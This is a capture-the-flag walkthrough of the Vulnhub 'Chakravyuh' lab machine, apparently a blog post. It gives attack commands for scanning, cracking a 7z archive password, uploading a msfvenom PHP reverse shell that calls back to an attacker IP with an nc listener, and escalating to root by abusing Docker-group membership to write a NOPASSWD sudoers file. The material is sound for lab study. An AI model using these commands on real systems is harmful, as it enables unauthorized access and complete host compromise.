Vulnhub Chakravyuh Walkthrough

We start scanning the host : nmap –A –T4 –p- 192.168.1.3 –vv

Running dirb

There is an ftp service on port 65530 which allows login using anonymous username

The file we’ve downloaded is password protected

We need to download a python script called 7z2john.py to extracts the hash from the file and open it with John

python 7z2john.py arjun.7z > hash.txt

The password is family, let’s open the file.

The file contains a hash looks like a 64code we can crack it using base64

gila:admin@gmail.com:princesa

gila is a directory name 192.168.1.3/gila

Running dirb gave us http://192.168.1.3/gila/admin/ now we login with the email admin@gmail.com and the password princesa.

After we login there is a File Manager where we can upload a php shell, upload it to the tmp folder

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -f raw -o shell.php

Now visit the link using http://192.168.1.3/gila/tmp/shell.php also make sure to start Metasploit and start a session, or just open a listening port using nc –lvp 4444

Reading the group file we can see that we in a Docker group, we can escalate from there.

Just write the following commands :

docker run –privileged –interactive –tty –volume /:/host bash

echo “www-data ALL=(ALL) NOPASSWD: ALL” > /host/etc/sudoers.d/foo

Now just read the final.txt

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s